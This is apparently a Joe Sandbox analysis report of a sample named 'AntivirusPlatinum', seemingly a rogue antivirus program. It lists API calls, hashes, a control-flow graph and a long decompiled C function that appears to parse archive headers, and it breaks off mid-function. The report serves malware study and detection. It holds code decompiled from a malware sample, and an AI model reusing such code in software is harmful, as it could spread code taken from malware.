                                                                                                                                                      0x0040cc14
                                                                                                                                                      0x0040cc15
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cbf2
                                                                                                                                                      0x0040cbf2
                                                                                                                                                      0x0040cc00
                                                                                                                                                      0x0040cc0b
                                                                                                                                                      0x0040cc1b
                                                                                                                                                      0x0040cc1d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cc1d
                                                                                                                                                      0x0040cbf0
                                                                                                                                                      0x0040cb56
                                                                                                                                                      0x0040cb66
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cb66
                                                                                                                                                      0x0040cb5c
                                                                                                                                                      0x0040cb5d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cb64
                                                                                                                                                      0x0040cb6d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cb6d
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageA.USER32 ref: 0040CB8C
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000066,00000172,00000000,EC050B71), ref: 0040CBA1
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040CBB0
                                                                                                                                                      • SendMessageA.USER32 ref: 0040CBC5
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040CBC9
                                                                                                                                                      • SendMessageA.USER32 ref: 0040CBD8
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040CC15
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Item$ColorDialog
                                                                                                                                                      • String ID: LICENSEDLG
                                                                                                                                                      • API String ID: 1567230415-2177901306
                                                                                                                                                      • Opcode ID: 01760e1f4c38ce4e5e33aba2a4cd8c6bda376a24c8dc7a6e2c1aa10115963a11
                                                                                                                                                      • Instruction ID: 32aadb3c41ccaf98f700fdda87381be768b7f3295c14a38e3d64121b63e1e91d
                                                                                                                                                      • Opcode Fuzzy Hash: 01760e1f4c38ce4e5e33aba2a4cd8c6bda376a24c8dc7a6e2c1aa10115963a11
                                                                                                                                                      • Instruction Fuzzy Hash: CC21B071240209BEE6116F61EDC6FBB376DE745B84F008036FB01F50E0C6B99C61966D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 900 401ce5-401d18 call 401200 call 404fdc call 408eac 907 401d72-401d76 900->907 908 401d1a-401d2f 900->908 910 401de3-401de8 call 408d14 907->910 908->907 909 401d31 908->909 911 401d33-401d3b 909->911 912 401d3d-401d54 call 40568a 909->912 915 401ded-401df1 910->915 911->907 911->912 917 401d56-401d58 call 401b80 912->917 919 401d78-401d86 912->919 915->917 918 401df7-401e41 call 408dc6 call 408da4 call 408dc6 * 2 915->918 924 401d5d 917->924 945 401e43-401e6f call 4098f7 call 40b2a9 call 40325c 918->945 946 401e74-401e7d 918->946 922 401db3-401de0 call 402dbd 919->922 923 401d88-401d9b call 402c96 919->923 922->910 923->922 936 401d9d-401dae call 404f2e call 40343e 923->936 929 401d61 924->929 933 401d63-401d66 call 40a205 929->933 934 401d6b-401d6d 929->934 933->934 938 40250c-402510 934->938 936->922 945->924 948 401e83-401e86 946->948 949 401e7f-401e81 946->949 950 401e88-401e8b 948->950 951 401e8d-401e93 948->951 953 401e94-401ec3 call 408d14 949->953 950->949 950->951 951->953 958 4023a1-4023da call 408dc6 call 408e05 953->958 959 401ec9-401eca 953->959 976 4023eb-40240f call 408e82 958->976 980 4023dc-4023e6 call 408da4 958->980 962 401f49-401f52 959->962 963 401ecc-401ecf 959->963 966 401f54 962->966 967 401f5a-401fef call 408e05 * 2 call 408da4 call 408e05 * 2 call 408da4 * 2 call 408dc6 call 408e05 962->967 963->962 968 401ed1-401ed2 963->968 966->967 1041 401ff1-402009 call 408e05 * 2 967->1041 1042 40200b-40201d 967->1042 971 401f03-401f1b 968->971 972 401ed4-401edc 968->972 977 401f2c-401f2f 971->977 978 401f1d-401f27 call 408e05 971->978 975 401ee2-401efe call 408e05 972->975 972->976 975->976 992 4024c1-4024cd 976->992 993 402415-402431 976->993 977->976 979 401f35-401f44 call 408dc6 977->979 978->977 979->976 980->976 994 4024fa-402500 992->994 995 4024cf 992->995 993->992 997 402437-40243a 993->997 1003 402502-402505 call 40a205 994->1003 1004 40250a 994->1004 998 4024d1-4024dd 995->998 999 4024df-4024f8 call 4098f7 call 40b2a9 995->999 1001 40248a-4024a1 call 4098f7 call 40b2a9 call 404f2e 997->1001 1002 40243c-402443 997->1002 998->994 998->999 1025 4024a6-4024bc call 40325c 999->1025 1001->1025 1002->1001 1008 402445-402466 call 40a7e9 call 404fdc call 4054ed 1002->1008 1003->1004 1004->938 1033 40246a-402473 call 40574f 1008->1033 1025->929 1039 402475 1033->1039 1040 402479-40247a 1033->1040 1039->1040 1040->1033 1043 40247c-402488 call 40a810 1040->1043 1046 402028-40207f call 401030 * 2 1041->1046 1042->1046 1047 40201f-402026 1042->1047 1043->992 1043->1001 1056 402081 1046->1056 1057 402084-4020ba call 408e4a call 40db30 1046->1057 1047->1046 1056->1057 1062 4020c0-4020d8 1057->1062 1063 402147-40214a 1057->1063 1066 4020da 1062->1066 1067 4020dd-4020df 1062->1067 1064 402150-402159 1063->1064 1065 4021f2-4021fb 1063->1065 1068 4021e2-4021e4 1064->1068 1069 40215f-402181 call 4030db call 40a384 1064->1069 1070 4021fd-402209 call 408e4a 1065->1070 1071 40220e-40223b call 40def9 1065->1071 1066->1067 1067->1065 1072 4020e5-40210f call 401708 call 408e4a call 40a4e9 1067->1072 1073 4021eb-4021ed call 401c42 1068->1073 1093 4021b0-4021cc call 4030ec 1069->1093 1094 402183-4021ae call 40e1db call 40e115 CharToOemA 1069->1094 1070->1071 1084 402241-402274 call 408dc6 1071->1084 1085 402319-402353 call 408e82 1071->1085 1072->1065 1103 402115-402142 1072->1103 1073->1065 1095 40227b-402290 1084->1095 1085->976 1098 402359-402360 1085->1098 1102 4021d1-4021d5 1093->1102 1094->1102 1100 402292-402296 1095->1100 1101 402308-402313 1095->1101 1104 402362-40236a call 40a5e2 1098->1104 1105 40236f-40239f call 40325c call 40dba8 call 4098f7 call 40b2a9 1098->1105 1107 4022b1-4022c2 1100->1107 1108 402298-4022ae call 408e05 call 40def9 1100->1108 1101->1085 1101->1095 1102->1073 1109 4021d7-4021e0 1102->1109 1103->1065 1104->1105 1105->976 1115 4022c4 1107->1115 1116 4022c7-4022d0 1107->1116 1108->1107 1109->1073 1115->1116 1120 4022d2-4022d7 1116->1120 1121 4022f6-402305 1116->1121 1124 4022d9-4022f4 call 408da4 1120->1124 1121->1101 1124->1121
                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E00401CE5(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                                      				char _v5;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				CHAR* _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				intOrPtr* _v24;
                                                                                                                                                      				signed char _v25;
                                                                                                                                                      				signed char _v26;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				signed int _v40;
                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                      				signed int _v56;
                                                                                                                                                      				char _v60;
                                                                                                                                                      				signed short _v64;
                                                                                                                                                      				signed char _v68;
                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                      				char _v88;
                                                                                                                                                      				char _v92;
                                                                                                                                                      				signed int _v104;
                                                                                                                                                      				char _v108;
                                                                                                                                                      				void _v128;
                                                                                                                                                      				char _v4224;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				intOrPtr _t269;
                                                                                                                                                      				signed int _t282;
                                                                                                                                                      				signed int _t284;
                                                                                                                                                      				signed int _t288;
                                                                                                                                                      				signed int _t294;
                                                                                                                                                      				signed int _t295;
                                                                                                                                                      				void* _t308;
                                                                                                                                                      				signed int _t309;
                                                                                                                                                      				signed int _t311;
                                                                                                                                                      				intOrPtr* _t315;
                                                                                                                                                      				signed int* _t335;
                                                                                                                                                      				signed short _t342;
                                                                                                                                                      				intOrPtr _t347;
                                                                                                                                                      				signed int _t358;
                                                                                                                                                      				intOrPtr _t359;
                                                                                                                                                      				void* _t361;
                                                                                                                                                      				signed char _t374;
                                                                                                                                                      				signed int _t375;
                                                                                                                                                      				signed int _t376;
                                                                                                                                                      				signed int _t382;
                                                                                                                                                      				void* _t394;
                                                                                                                                                      				signed int _t409;
                                                                                                                                                      				void* _t429;
                                                                                                                                                      				signed int _t432;
                                                                                                                                                      				void* _t440;
                                                                                                                                                      				signed short _t449;
                                                                                                                                                      				signed int _t452;
                                                                                                                                                      				signed int _t456;
                                                                                                                                                      				signed int _t465;
                                                                                                                                                      				signed int* _t475;
                                                                                                                                                      				signed int _t488;
                                                                                                                                                      				signed int _t490;
                                                                                                                                                      				signed int _t500;
                                                                                                                                                      				signed int _t514;
                                                                                                                                                      				signed int _t526;
                                                                                                                                                      				void* _t529;
                                                                                                                                                      				signed char* _t533;
                                                                                                                                                      				signed int* _t537;
                                                                                                                                                      				signed int _t539;
                                                                                                                                                      				void* _t541;
                                                                                                                                                      				signed int _t548;
                                                                                                                                                      				short* _t549;
                                                                                                                                                      				signed int _t552;
                                                                                                                                                      				signed short* _t555;
                                                                                                                                                      				signed int _t557;
                                                                                                                                                      				signed int _t559;
                                                                                                                                                      				intOrPtr* _t561;
                                                                                                                                                      				signed int _t563;
                                                                                                                                                      				signed int _t566;
                                                                                                                                                      				signed char* _t568;
                                                                                                                                                      				intOrPtr _t569;
                                                                                                                                                      				void* _t570;
                                                                                                                                                      				void* _t571;
                                                                                                                                                      				void* _t574;
                                                                                                                                                      				signed int _t578;
                                                                                                                                                      				signed int _t581;
                                                                                                                                                      
                                                                                                                                                      				_t526 = __edx;
                                                                                                                                                      				E00401200(0x107c);
                                                                                                                                                      				_t440 = __ecx; // executed
                                                                                                                                                      				_t269 = E00404FDC(__ecx, __edx); // executed
                                                                                                                                                      				 *((intOrPtr*)(__ecx + 0x6d78)) = _t269;
                                                                                                                                                      				 *(__ecx + 0x6d7c) = __edx;
                                                                                                                                                      				E00408EAC( &_v56, __ecx);
                                                                                                                                                      				if( *((char*)(__ecx + 0x6d90)) == 0) {
                                                                                                                                                      					L10:
                                                                                                                                                      					_v5 = 0;
                                                                                                                                                      					L15:
                                                                                                                                                      					E00408D14(_t440,  &_v56, 7); // executed
                                                                                                                                                      					__eflags = _v40;
                                                                                                                                                      					if(_v40 == 0) {
                                                                                                                                                      						L5:
                                                                                                                                                      						E00401B80(_t440, _t526);
                                                                                                                                                      						L6:
                                                                                                                                                      						_t581 = _v56;
                                                                                                                                                      						L7:
                                                                                                                                                      						if(_t581 != 0) {
                                                                                                                                                      							E0040A205(_v56);
                                                                                                                                                      						}
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      					E00408DC6( &_v56, _t440 + 0x4680);
                                                                                                                                                      					E00408DA4( &_v56,  &_v26);
                                                                                                                                                      					_t533 = _t440 + 0x4688;
                                                                                                                                                      					 *(_t440 + 0x4684) = _v26 & 0x000000ff;
                                                                                                                                                      					E00408DC6( &_v56, _t533);
                                                                                                                                                      					_t555 = _t440 + 0x468a;
                                                                                                                                                      					E00408DC6( &_v56, _t555);
                                                                                                                                                      					_t449 =  *_t555 & 0x0000ffff;
                                                                                                                                                      					__eflags = _t449 - 7;
                                                                                                                                                      					if(_t449 >= 7) {
                                                                                                                                                      						_t282 =  *(_t440 + 0x4684);
                                                                                                                                                      						__eflags = _t282 - 0x75;
                                                                                                                                                      						if(_t282 != 0x75) {
                                                                                                                                                      							__eflags = _t282 - 0x73;
                                                                                                                                                      							if(_t282 != 0x73) {
                                                                                                                                                      								L22:
                                                                                                                                                      								_t284 = (_t449 & 0x0000ffff) - 7;
                                                                                                                                                      								__eflags = _t284;
                                                                                                                                                      								_push(_t284);
                                                                                                                                                      								L23:
                                                                                                                                                      								E00408D14(_t440,  &_v56);
                                                                                                                                                      								asm("cdq");
                                                                                                                                                      								asm("adc edx, [ebx+0x6d7c]");
                                                                                                                                                      								 *((intOrPtr*)(_t440 + 0x6d80)) = ( *_t555 & 0x0000ffff) +  *((intOrPtr*)(_t440 + 0x6d78));
                                                                                                                                                      								_t288 =  *(_t440 + 0x4684);
                                                                                                                                                      								_t452 = _t288 - 0x73;
                                                                                                                                                      								__eflags = _t452;
                                                                                                                                                      								 *(_t440 + 0x6d84) = _t526;
                                                                                                                                                      								if(_t452 == 0) {
                                                                                                                                                      									asm("movsd");
                                                                                                                                                      									asm("movsd");
                                                                                                                                                      									asm("movsd");
                                                                                                                                                      									E00408DC6( &_v56, _t440 + 0x4698);
                                                                                                                                                      									E00408E05( &_v56, _t440 + 0x469c);
                                                                                                                                                      									__eflags =  *(_t440 + 0x4694) & 0x00000200;
                                                                                                                                                      									if(( *(_t440 + 0x4694) & 0x00000200) != 0) {
                                                                                                                                                      										E00408DA4( &_v56, _t440 + 0x46a0);
                                                                                                                                                      									}
                                                                                                                                                      									L76:
                                                                                                                                                      									_t294 = E00408E82( &_v56, 0);
                                                                                                                                                      									__eflags = _v5;
                                                                                                                                                      									_t456 =  *(_t440 + 0x4684);
                                                                                                                                                      									_t295 =  !_t294;
                                                                                                                                                      									 *(_t440 + 0x6d9a) = _t295;
                                                                                                                                                      									 *(_t440 + 0x4678) = _t456;
                                                                                                                                                      									if(_v5 == 0) {
                                                                                                                                                      										L87:
                                                                                                                                                      										__eflags =  *(_t440 + 0x6d84) -  *((intOrPtr*)(_t440 + 0x6d7c));
                                                                                                                                                      										if(__eflags > 0) {
                                                                                                                                                      											L91:
                                                                                                                                                      											_t557 = _v40;
                                                                                                                                                      											__eflags = _v56;
                                                                                                                                                      											if(_v56 != 0) {
                                                                                                                                                      												E0040A205(_v56);
                                                                                                                                                      											}
                                                                                                                                                      											return _t557;
                                                                                                                                                      										}
                                                                                                                                                      										if(__eflags < 0) {
                                                                                                                                                      											L90:
                                                                                                                                                      											E0040B2A9(_t440 + 0x17, E004098F7(0x68), "???");
                                                                                                                                                      											L86:
                                                                                                                                                      											 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                      											E0040325C(0x414c7c, 3);
                                                                                                                                                      											__eflags = _v56;
                                                                                                                                                      											goto L7;
                                                                                                                                                      										}
                                                                                                                                                      										__eflags =  *((intOrPtr*)(_t440 + 0x6d80)) -  *((intOrPtr*)(_t440 + 0x6d78));
                                                                                                                                                      										if( *((intOrPtr*)(_t440 + 0x6d80)) >  *((intOrPtr*)(_t440 + 0x6d78))) {
                                                                                                                                                      											goto L91;
                                                                                                                                                      										}
                                                                                                                                                      										goto L90;
                                                                                                                                                      									}
                                                                                                                                                      									_t529 = _v52 - _v40 + 8;
                                                                                                                                                      									 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) + _t529;
                                                                                                                                                      									asm("adc [ebx+0x6d84], edi");
                                                                                                                                                      									__eflags =  *((intOrPtr*)(_t440 + 0x4680)) - _t295;
                                                                                                                                                      									if( *((intOrPtr*)(_t440 + 0x4680)) == _t295) {
                                                                                                                                                      										goto L87;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = _t456 - 0x7b;
                                                                                                                                                      									if(_t456 != 0x7b) {
                                                                                                                                                      										L85:
                                                                                                                                                      										E0040B2A9(_t440 + 0x17, E004098F7(0x70), _t440 + 0x17);
                                                                                                                                                      										E00404F2E(_t440);
                                                                                                                                                      										goto L86;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags =  *(_t440 + 0x5398) & 0x00000004;
                                                                                                                                                      									if(( *(_t440 + 0x5398) & 0x00000004) == 0) {
                                                                                                                                                      										goto L85;
                                                                                                                                                      									}
                                                                                                                                                      									E0040A7E9( &_v92, _t529, _t440);
                                                                                                                                                      									_t308 = E00404FDC(_t440, _t529);
                                                                                                                                                      									_push(0);
                                                                                                                                                      									_t559 = 7;
                                                                                                                                                      									_t309 = _t308 - _t559;
                                                                                                                                                      									__eflags = _t309;
                                                                                                                                                      									asm("sbb edx, edi");
                                                                                                                                                      									_push(_t529);
                                                                                                                                                      									_push(_t309);
                                                                                                                                                      									E004054ED(_t440);
                                                                                                                                                      									_v5 = 1;
                                                                                                                                                      									do {
                                                                                                                                                      										_t311 = E0040574F(_t440);
                                                                                                                                                      										__eflags = _t311;
                                                                                                                                                      										if(_t311 != 0) {
                                                                                                                                                      											_v5 = 0;
                                                                                                                                                      										}
                                                                                                                                                      										_t559 = _t559 - 1;
                                                                                                                                                      										__eflags = _t559;
                                                                                                                                                      									} while (_t559 != 0);
                                                                                                                                                      									E0040A810( &_v92);
                                                                                                                                                      									__eflags = _v5;
                                                                                                                                                      									if(_v5 != 0) {
                                                                                                                                                      										goto L87;
                                                                                                                                                      									}
                                                                                                                                                      									goto L85;
                                                                                                                                                      								}
                                                                                                                                                      								_t465 = _t452 - 1;
                                                                                                                                                      								__eflags = _t465;
                                                                                                                                                      								if(_t465 == 0) {
                                                                                                                                                      									L33:
                                                                                                                                                      									__eflags = _t288 - 0x74;
                                                                                                                                                      									_t315 = _t440 + 0x46a8;
                                                                                                                                                      									if(_t288 != 0x74) {
                                                                                                                                                      										_t315 = _t440 + 0x53b8;
                                                                                                                                                      									}
                                                                                                                                                      									asm("movsd");
                                                                                                                                                      									asm("movsd");
                                                                                                                                                      									_v24 = _t315;
                                                                                                                                                      									asm("movsd");
                                                                                                                                                      									_v64 = _t315 + 0xc;
                                                                                                                                                      									E00408E05( &_v56, _t315 + 0xc);
                                                                                                                                                      									_t561 = _v24;
                                                                                                                                                      									_t66 = _t561 + 0x10; // 0x10
                                                                                                                                                      									_v20 = _t66;
                                                                                                                                                      									E00408E05( &_v56, _t66);
                                                                                                                                                      									_t69 = _t561 + 0x14; // 0x14
                                                                                                                                                      									E00408DA4( &_v56, _t69);
                                                                                                                                                      									_t71 = _t561 + 0x18; // 0x18
                                                                                                                                                      									E00408E05( &_v56, _t71);
                                                                                                                                                      									_t73 = _t561 + 0x1c; // 0x1c
                                                                                                                                                      									_v60 = _t73;
                                                                                                                                                      									E00408E05( &_v56, _t73);
                                                                                                                                                      									_t76 = _t561 + 0x20; // 0x20
                                                                                                                                                      									E00408DA4( &_v56, _t76);
                                                                                                                                                      									_t78 = _t561 + 0x21; // 0x21
                                                                                                                                                      									E00408DA4( &_v56, _t78);
                                                                                                                                                      									_t80 = _t561 + 0x22; // 0x22
                                                                                                                                                      									_v12 = _t80;
                                                                                                                                                      									E00408DC6( &_v56, _t80);
                                                                                                                                                      									_t83 = _t561 + 0x24; // 0x24
                                                                                                                                                      									E00408E05( &_v56, _t83);
                                                                                                                                                      									_t85 = _t561 + 0x28; // 0x28
                                                                                                                                                      									_t537 = _t85;
                                                                                                                                                      									__eflags =  *(_t561 + 8) & 0x00000100;
                                                                                                                                                      									if(( *(_t561 + 8) & 0x00000100) == 0) {
                                                                                                                                                      										_t475 = _v20;
                                                                                                                                                      										 *_t537 =  *_t537 & 0x00000000;
                                                                                                                                                      										_t94 = _t561 + 0x2c; // 0x2c
                                                                                                                                                      										_t335 = _t94;
                                                                                                                                                      										 *_t335 =  *_t335 & 0x00000000;
                                                                                                                                                      										__eflags =  *_t475 - 0xffffffff;
                                                                                                                                                      										_v16 = _t335;
                                                                                                                                                      										if( *_t475 == 0xffffffff) {
                                                                                                                                                      											_t526 = 0x7fffffff;
                                                                                                                                                      											 *_t475 = 0x7fffffff;
                                                                                                                                                      											 *_t335 = 0x7fffffff;
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										E00408E05( &_v56, _t537);
                                                                                                                                                      										_t90 = _t561 + 0x2c; // 0x2c
                                                                                                                                                      										_v16 = _t90;
                                                                                                                                                      										E00408E05( &_v56, _t90);
                                                                                                                                                      									}
                                                                                                                                                      									 *((intOrPtr*)(_t561 + 0xcd8)) = E00401030( *_t537, 0, 0, 1) +  *_v64;
                                                                                                                                                      									asm("adc edx, edi");
                                                                                                                                                      									 *(_t561 + 0xcdc) = _t526;
                                                                                                                                                      									 *((intOrPtr*)(_t561 + 0xce0)) = E00401030( *_v16, 0, 0, 1) +  *_v20;
                                                                                                                                                      									_t342 =  *_v12 & 0x0000ffff;
                                                                                                                                                      									asm("adc edx, edi");
                                                                                                                                                      									_t539 = 0xfff;
                                                                                                                                                      									 *(_t561 + 0xce4) = _t526;
                                                                                                                                                      									__eflags = _t342 - 0xfff;
                                                                                                                                                      									if(_t342 < 0xfff) {
                                                                                                                                                      										_t539 = _t342 & 0x0000ffff;
                                                                                                                                                      									}
                                                                                                                                                      									E00408E4A( &_v56,  &_v4224, _t539);
                                                                                                                                                      									_t107 = _t561 + 0x30; // 0x30
                                                                                                                                                      									 *((char*)(_t570 + _t539 - 0x107c)) = 0;
                                                                                                                                                      									_v16 = _t107;
                                                                                                                                                      									E0040DB30(_t107,  &_v4224, 0x400);
                                                                                                                                                      									_t347 =  *((intOrPtr*)(_t561 + 4));
                                                                                                                                                      									__eflags = _t347 - 0x7a;
                                                                                                                                                      									if(_t347 != 0x7a) {
                                                                                                                                                      										__eflags = _t347 - 0x74;
                                                                                                                                                      										if(_t347 == 0x74) {
                                                                                                                                                      											__eflags =  *(_t561 + 8) & 0x00000200;
                                                                                                                                                      											if(( *(_t561 + 8) & 0x00000200) == 0) {
                                                                                                                                                      												__eflags = 0;
                                                                                                                                                      												 *((short*)(_t561 + 0x430)) = 0;
                                                                                                                                                      											} else {
                                                                                                                                                      												E004030DB( &_v88);
                                                                                                                                                      												_t394 = E0040A384( &_v88,  &_v4224);
                                                                                                                                                      												_t500 =  *_v12 & 0x0000ffff;
                                                                                                                                                      												_t132 = _t561 + 0x430; // 0x430
                                                                                                                                                      												_t549 = _t132;
                                                                                                                                                      												__eflags = _t394 - _t500;
                                                                                                                                                      												if(_t394 != _t500) {
                                                                                                                                                      													__eflags = _t500 - _t394 + 1;
                                                                                                                                                      													E004030EC( &_v88,  &_v4224, _t570 + _t394 + 1 - 0x107c, _t500 - _t394 + 1, _t549, 0x400);
                                                                                                                                                      												} else {
                                                                                                                                                      													E0040E1DB( &_v4224, _t549, 0x3ff);
                                                                                                                                                      													E0040E115(_t500, _t549, _v16, 0x3ff);
                                                                                                                                                      													CharToOemA(_v16, _v16);
                                                                                                                                                      												}
                                                                                                                                                      												__eflags =  *_t549;
                                                                                                                                                      												if( *_t549 == 0) {
                                                                                                                                                      													 *(_t561 + 8) =  *(_t561 + 8) & 0x0000fdff;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      											E00401C42(_t440);
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										_t552 = ( *(_t561 + 0xa) & 0x0000ffff) - ( *_v12 & 0x0000ffff) - 0x20;
                                                                                                                                                      										__eflags =  *(_t561 + 8) & 0x00000400;
                                                                                                                                                      										if(( *(_t561 + 8) & 0x00000400) != 0) {
                                                                                                                                                      											_t552 = _t552 - 8;
                                                                                                                                                      											__eflags = _t552;
                                                                                                                                                      										}
                                                                                                                                                      										__eflags = _t552;
                                                                                                                                                      										if(_t552 > 0) {
                                                                                                                                                      											_t117 = _t561 + 0xc30; // 0xc30
                                                                                                                                                      											E00401708(_t117, _t552);
                                                                                                                                                      											E00408E4A( &_v56,  *((intOrPtr*)(_t561 + 0xc30)), _t552);
                                                                                                                                                      											_t409 = E0040A4E9(_v16, 0x4122cc);
                                                                                                                                                      											__eflags = _t409;
                                                                                                                                                      											if(_t409 == 0) {
                                                                                                                                                      												 *((intOrPtr*)(_t440 + 0x4640)) = (((( *( *((intOrPtr*)(_t561 + 0xc30)) + 0xb) & 0x000000ff) << 8) + ( *( *((intOrPtr*)(_t561 + 0xc30)) + 0xa) & 0x000000ff) << 8) + ( *(_t410 + 9) & 0x000000ff) << 8) + ( *(_t410 + 8) & 0x000000ff);
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									__eflags =  *(_t561 + 8) & 0x00000400;
                                                                                                                                                      									if(( *(_t561 + 8) & 0x00000400) != 0) {
                                                                                                                                                      										_t147 = _t561 + 0xc3c; // 0xc3c
                                                                                                                                                      										E00408E4A( &_v56, _t147, 8);
                                                                                                                                                      									}
                                                                                                                                                      									_t150 = _t561 + 0xc44; // 0xc44
                                                                                                                                                      									E0040DEF9(_t150,  *_v60);
                                                                                                                                                      									 *((intOrPtr*)(_t561 + 0xc68)) = 0;
                                                                                                                                                      									 *((intOrPtr*)(_t561 + 0xc8c)) = 0;
                                                                                                                                                      									 *((intOrPtr*)(_t561 + 0xcb0)) = 0;
                                                                                                                                                      									__eflags =  *(_t561 + 8) & 0x00001000;
                                                                                                                                                      									if(( *(_t561 + 8) & 0x00001000) == 0) {
                                                                                                                                                      										L70:
                                                                                                                                                      										 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) +  *((intOrPtr*)(_t561 + 0xcd8));
                                                                                                                                                      										asm("adc [ebx+0x6d84], eax");
                                                                                                                                                      										_v68 =  *(_t561 + 8) >> 0x00000003 & 0x00000001;
                                                                                                                                                      										_t358 =  !(E00408E82( &_v56, _v68));
                                                                                                                                                      										 *(_t440 + 0x6d9a) = _t358;
                                                                                                                                                      										__eflags =  *_t561 - _t358;
                                                                                                                                                      										if( *_t561 != _t358) {
                                                                                                                                                      											_t359 = _v24;
                                                                                                                                                      											__eflags =  *((intOrPtr*)(_t359 + 4)) - 0x7a;
                                                                                                                                                      											if( *((intOrPtr*)(_t359 + 4)) == 0x7a) {
                                                                                                                                                      												E0040A5E2(_v16, "- ???");
                                                                                                                                                      											}
                                                                                                                                                      											 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                      											E0040325C(0x414c7c, 1);
                                                                                                                                                      											_t361 = E0040DBA8(_v16);
                                                                                                                                                      											E0040B2A9(_t440 + 0x17, E004098F7(0x68), _t361);
                                                                                                                                                      											_t571 = _t571 + 0xc;
                                                                                                                                                      										}
                                                                                                                                                      										goto L76;
                                                                                                                                                      									} else {
                                                                                                                                                      										E00408DC6( &_v56,  &_v64);
                                                                                                                                                      										_v84 = _t440 + 0x52ec;
                                                                                                                                                      										_v80 = _t440 + 0x5310;
                                                                                                                                                      										_v76 = _t440 + 0x5334;
                                                                                                                                                      										_v72 = _t440 + 0x5358;
                                                                                                                                                      										_v20 = 0;
                                                                                                                                                      										_v12 = 0xc;
                                                                                                                                                      										do {
                                                                                                                                                      											_t541 =  *(_t570 + _v20 * 4 - 0x50);
                                                                                                                                                      											_t374 = (_v64 & 0x0000ffff) >> _v12;
                                                                                                                                                      											_v68 = _t374;
                                                                                                                                                      											__eflags = _t374 & 0x00000008;
                                                                                                                                                      											if((_t374 & 0x00000008) == 0) {
                                                                                                                                                      												goto L69;
                                                                                                                                                      											}
                                                                                                                                                      											__eflags = _v20;
                                                                                                                                                      											if(_v20 != 0) {
                                                                                                                                                      												E00408E05( &_v56,  &_v60);
                                                                                                                                                      												E0040DEF9(_t541, _v60);
                                                                                                                                                      											}
                                                                                                                                                      											_t488 = 9;
                                                                                                                                                      											_t375 = memcpy( &_v128,  *(_t570 + _v20 * 4 - 0x50), _t488 << 2);
                                                                                                                                                      											_t574 = _t571 + 0xc;
                                                                                                                                                      											__eflags = _t375 & 0x00000004;
                                                                                                                                                      											if((_t375 & 0x00000004) != 0) {
                                                                                                                                                      												_t191 =  &_v108;
                                                                                                                                                      												 *_t191 = _v108 + 1;
                                                                                                                                                      												__eflags =  *_t191;
                                                                                                                                                      											}
                                                                                                                                                      											_v104 = _v104 & 0x00000000;
                                                                                                                                                      											_t563 = 3;
                                                                                                                                                      											_t376 = _t375 & _t563;
                                                                                                                                                      											__eflags = _t376;
                                                                                                                                                      											if(_t376 <= 0) {
                                                                                                                                                      												L68:
                                                                                                                                                      												_t490 = 9;
                                                                                                                                                      												memcpy( *(_t570 + _v20 * 4 - 0x50),  &_v128, _t490 << 2);
                                                                                                                                                      												_t571 = _t574 + 0xc;
                                                                                                                                                      												_t561 = _v24;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t566 = _t563 - _t376 << 3;
                                                                                                                                                      												__eflags = _t566;
                                                                                                                                                      												_t548 = _t376;
                                                                                                                                                      												do {
                                                                                                                                                      													E00408DA4( &_v56,  &_v25);
                                                                                                                                                      													_t382 = (_v25 & 0x000000ff) << _t566;
                                                                                                                                                      													_t566 = _t566 + 8;
